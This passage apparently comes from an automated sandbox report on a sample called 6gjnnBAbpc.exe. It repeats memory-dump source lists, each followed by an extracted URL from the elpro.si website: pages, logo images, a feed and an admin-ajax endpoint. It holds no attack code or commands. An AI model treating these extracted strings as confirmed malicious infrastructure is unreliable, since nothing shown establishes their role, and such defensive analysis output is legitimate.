00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/vlaga/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/potapljanje-z-orkami-nad-polarnim-krogom/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/privacy-policy/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/vam-vas-laboratorijski-hladilnik-govori-resnico/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/vzorcna-stran/feed/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-admin/admin-ajax.php
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/ELPRO-www-00-HOME-BZ-Logo_120x50-Calex.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/ELPRO-www-00-HOME-BZ-Logo_120x50-Comet.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/ELPRO-www-00-HOME-BZ-Logo_120x50-Ecom.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/ELPRO-www-00-HOME-BZ-Logo_120x50-Elpro.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/ELPRO-www-00-HOME-BZ-Logo_120x50-Inor.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/ELPRO-www-00-HOME-BZ-Logo_120x50-Michell.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/ELPRO-www-00-HOME-BZ-Logo_120x50-Mollet.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/ELPRO-www-00-HOME-BZ-Logo_120x50-Shinko.png
